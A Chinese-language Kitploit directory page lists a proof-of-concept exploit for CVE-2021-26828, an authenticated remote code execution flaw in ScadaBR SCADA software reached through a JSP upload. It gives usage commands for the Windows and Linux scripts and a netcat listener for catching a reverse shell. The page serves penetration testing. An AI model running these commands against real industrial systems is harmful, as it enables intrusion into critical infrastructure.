Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-26828_ScadaBR_RCE — CVE-2021-26828的概念验证利用代码,通过JSP文件上传实现ScadaBR SCADA系统上的认证远程代码执行。支持Windows和Linux目标,使用反向Shell载荷。 | Kitploit
工具/GitHubGitHub/hev0x/cve-2021-26828_scadabr_rce
漏洞分析漏洞利用SCADA/ICS安全Web应用程序漏洞利用渗透测试远程访问工具
GitHubhev0x/cve-2021-26828_scadabr_rce

CVE-2021-26828_ScadaBR_RCE

CVE-2021-26828的概念验证利用代码,通过JSP文件上传实现ScadaBR SCADA系统上的认证远程代码执行。支持Windows和Linux目标,使用反向Shell载荷。

查看仓库
94105年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

POC CVE-2021-26828_ScadaBR_远程代码执行

  • ScadaBR 0.9.1 on Linux 以及 1.0 和 1.12.4CE on Windows 允许远程认证用户通过 'view_edit.shtm' 上传并执行任意 JSP 文件,实现远程代码执行。

漏洞利用

命令:

  • Windows: $ sudo python WinScada_RCE.py <远程主机> <远程端口> <用户名> <密码>

  • Linux: 首先在你的本地机器上打开任意端口,再执行漏洞利用:

$ sudo nc -vnlp 4444

$ sudo python LinScada_RCE.py <远程主机> <远程端口> <用户名> <密码> <反弹IP> <反弹端口>

  • 参考:

    https://www.exploit-db.com/exploits/49734

    https://www.exploit-db.com/exploits/49735

    https://www.youtube.com/watch?v=k1teIStQr1A

下载工具